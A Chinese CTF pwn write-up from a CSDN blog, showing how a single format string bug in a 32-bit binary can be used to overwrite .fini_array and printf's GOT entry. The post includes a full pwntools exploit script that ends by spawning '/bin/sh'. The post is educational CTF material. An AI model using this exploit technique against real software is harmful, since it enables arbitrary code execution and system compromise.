格式化字符串漏洞-无限循环

最新推荐文章于 2024-04-09 14:41:37 发布
最新推荐文章于 2024-04-09 14:41:37 发布
阅读量1.5k 收藏 4
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/92399248
版权
格式化字符串漏洞-无限循环

程序大致逻辑如下,程序存在system函数,保护只开了NX

 setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  puts("Welcome to my ctf! What's your name?");
  __isoc99_scanf("%64s", &format);
  printf("Hello ");
  printf(&format);
  return 0;

存在格式化字符串漏洞,但是利用完之后没有别的函数执行。只能利用一次且没有别的函数可以执行。

但是有一种方法可以使程序达到无限循环。

一个程序的流程执行如下所示:

在这里插入图片描述
在main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针

在这里插入图片描述

我们修改其函数指针的地址为main即可在结束时重新调用main函数重新调用函数

同时我们可以将printf的got表内容修改至system函数的地址调用system地址

接着我们在查看一下我们输入的字符串的偏移,再printf处下断点

在这里插入图片描述

我们输入所处的偏移为4

最终确定payload如下

payload=p32(fini_array)+p32(printf_got)+"%134513964c%4$n"+"%4294966940c%5$n"

但是由于交互问题此时接收数据太长,传输效果不好。因此我们改用hn传输

payload="\x9c\x97\x04\x08\x9e\x97\x04\x08\x9c\x98\x04\x08\x9e\x98\x04\x08%34084c%4$ hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"

from pwn import *
p=process('./pwn')
context.log_level='debug'
p.recvuntil("Welcome to my ctf! What's your name?\n")
fini_array=0x0804979c
fini_1=0x0804979e
printf_got=0x0804989c
system_plt=0x080483d0
main_addr=0x08048534
payload="\x9c\x97\x04\x08\x9e\x97\x04\x08\x9c\x98\x04\x08\x9e\x98\x04\x08%34084c%4$hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"
#payload=p32(fini_array)+p32(printf_got)+"%134513964c%4$n%4294966940c%5$n"

p.send(payload)
sleep(2)
p.recvuntil("Welcome to my ctf! What's your name?\n")
p.sendline("/bin/sh\x00")
p.interactive()
playmak3r
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
格式化字符串漏洞攻击
从来不在调
03-20 2381
格式化字符串漏洞攻击,主要有以下三点。 1 拒绝服务攻击 2 查看内存攻击 3 写入任意内存攻击 我们这要说一下危害最大的任何写入内存攻击。 注意:最新版的Linux,先关闭地址随机化保护和利用GCC 编译时打开-z execstack 代码如下: 如大家所见,我把存在漏洞的函数规定为折构函数(程序结束后,协助程序完成一些期望的工作),这样子的化,我们不到那可以重写内存,还可以执
格式化字符串漏洞利用 二、格式化函数
热门推荐
龙哥盟
04-12 3万+
二、格式化函数格式化函数是一类特殊的 ANSI C 函数,接受可变数量的参数,其中的一个就是所谓的格式化字符串。当函数求解格式化字符串时,它会访问向函数提供的额外参数。它是一个转换函数,用于将原始的 C 数据类型表示为人类可读的字符串形式。它们在几乎任何 C 程序中都会使用,来输出信息、打印错误信息或处理字符串。这一章中,我们会涵盖格式化函数使用中的典型漏洞,正确用法,它们的一些参数,以及格式化字符
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
最新发布
WdIg-2023的博客
04-09 2340
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
字符串格式化漏洞
CNXBDSa的博客
07-27 296
#pwn1# 做pwn题首先是放入虚拟机中先运行一下 看看是什么函数 然后放入ubuntu中 **checksec +**文件,查看是多少位 和有什么保护机制 然后放入ida中查看 PS:因为知道是字符串格式化漏洞所以要尤其注意printf这个函数 -----放入ida中首先是查看mian函数 按f5或者tab键查看他的伪代码 然后知道是字符串 那么&s这种是我...
格式化字符串漏洞
摸爬滚打
04-28 2891
当printf系列函数的格式化串里包含用户提交的数据时,就有可能出现格式化漏洞。 函数包括: snprintf vfprintf vprintf vsprintf vsnprintf 除了这呰函数外,其他接受C风格格式符的函数也可能存在类似风险,例如wind0ws上的wprintf函数。攻击者可能提交许多格式符(而不提供对应的变量),这样的话,栈上就没有和格式符相对应的参数,因此,系
C++C字符串总结.pdf
09-30
- 初始化字符数组时,如果数组长度小于初始化字符串的长度,会导致数组溢出,这是非常危险的,可能导致程序崩溃或安全漏洞。 - 当使用`printf`或`scanf`处理字符串时,确保有足够的空间容纳字符串,否则可能会覆盖...
weakscan(漏洞扫描工具)V1.3.2
06-21
weakscan是拥有独立知识产权的国产软件,能够检查c/c++/java代码文件中存在的代码漏洞。包括内存泄漏、缓冲区溢出、越界访问、SQL注入、格式化字符串劫持等百余中漏洞
Fuzzing_模糊测试--强制性安全漏洞发掘
07-05
12.6 实例研究:REALPLAYER REALPIX格式化字符串漏洞 12.7 语言 12.8 小结 第13章 文件格式模糊测试:Windows平台上的自动化测试 13.1 Windows文件格式漏洞 13.2 FileFuzz的特性 13.2.1 创建文件 13.2.2 应用程序...
SP2019-LAB3.1&3.2-3170103455-黄炯睿1
08-03
在Lab 3.1中,我们使用Splint来查找缓冲区溢出和格式化字符串漏洞。缓冲区溢出是常见的安全问题,可能导致程序崩溃或数据泄露。在示例代码中,`func`函数通过`strcpy`直接复制源字符串到固定大小的`buffer`,而没有...
【技术分享】Fuzzingbook学习指南 Lv1 .pdf
09-05
例如,`fuzzer`函数可以通过指定最大长度、字符起始位置和范围来生成不同格式的随机字符串。 ```python def fuzzer(max_length=100, char_start=32, char_range=32): str_len = random.randrange(0, max_length + ...
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
c代码格式化_CTF| 格式化字符串漏洞
weixin_39737947的博客
11-26 341
格式化字符串漏洞是PWN题常见的考察点,仅次于栈溢出漏洞漏洞原因:程序使用了格式化字符串作为参数,并且格式化字符串为用户可控。其中触发格式化字符串漏洞函数主要是printf、sprintf、fprintf、prin等C库中print家族的函数。0x01 格式化字符串介绍printf("格式化字符串",参数...)该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用...
格式化字符串漏洞-手动触发
helloworlddm的博客
05-23 265
漏洞原因 程序使用了格式化字符串作为参数,并且格式化字符串为用户可控。其中触发格式化字符串漏洞函数主要是printf、sprintf、fprintf、prin等C库中print家族的函数。 出现漏洞的代码 正常的代码: //gcc test.c -o test -m32 #include<stdio.h> //#include<stdlib.h> //#include<string.h> /*int test(int a,int b){ //int len
Format String 漏洞介绍 总结(五)
爱.NET
05-29 333
Format String 漏洞介绍 总结(五)Bkbll(bkbll@cnhonker.net)2003-6-104.关于 format string漏洞在non-exec stack linux x86上的应用.这里不特指使用了哪些non-exec stack补丁的系统, 我们的利用目的就是让我们的代码执行起来, 利用的方法可以有以下两种:1. 利用execv 直接执行我们的代码, 这样避免了...
CTF| 格式化字符串漏洞
Sakura给爷pwn全场
10-07 645
CTF| 格式化字符串漏洞: https://www.freebuf.com/column/207425.html
ROP-基础-ret2text
ATFWUS的博客
02-28 718
文件下载地址: 链接:https://pan.baidu.com/s/1_zJ6U5QYokpjSiYLjiM3iA 提取码:gqrc 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabl...
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 887
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
seedlab 格式化字符串漏洞
06-01
Seedlab 的格式化字符串漏洞实验是一个针对 C 语言中常见漏洞的实验,通过这个实验可以帮助学生了解格式化字符串漏洞的原理和防范方法。 在这个实验中,学生需要编写一个程序,该程序接受用户输入的字符串,并将其作为格式化字符串输出。由于用户可以输入任意的字符串,如果程序没有正确过滤用户输入,那么攻击者就可以利用格式化字符串漏洞来执行任意代码,甚至可能导致程序崩溃或者被完全控制。 为了防范格式化字符串漏洞,程序应该对用户输入进行正确的过滤和验证。比如,可以使用限制输入长度、使用固定格式字符串等方式来减少漏洞的风险。此外,在使用格式化字符串输出时,应该尽量避免使用用户输入的字符串作为格式化字符串的一部分,而是使用固定的格式字符串和用户输入的参数来进行输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值